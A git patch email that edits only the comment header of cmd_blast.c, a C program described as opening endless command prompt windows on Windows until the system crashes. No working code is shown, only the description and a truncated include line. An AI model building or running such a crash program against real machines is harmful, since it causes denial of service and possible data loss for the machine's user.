From d5c00d2c8e24e72342ff1bac59c0ab2d9adbe660 Mon Sep 17 00:00:00 2001 From: Minhas Kamal Date: Sat, 24 Dec 2016 20:48:22 +0600 Subject: [PATCH] Opens an infinite number of command prompt window till the system crushes. --- cmd_blast.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cmd_blast.c b/cmd_blast.c index fe9200c..b9ecdb3 100644 --- a/cmd_blast.c +++ b/cmd_blast.c @@ -1,5 +1,4 @@ -// Developer: Minhas Kamal -// Opens an infinite number of command prompt window till the system crushes. +// Opens an infinite number of command prompt window till the system crushes. Works on Windows OS only. #include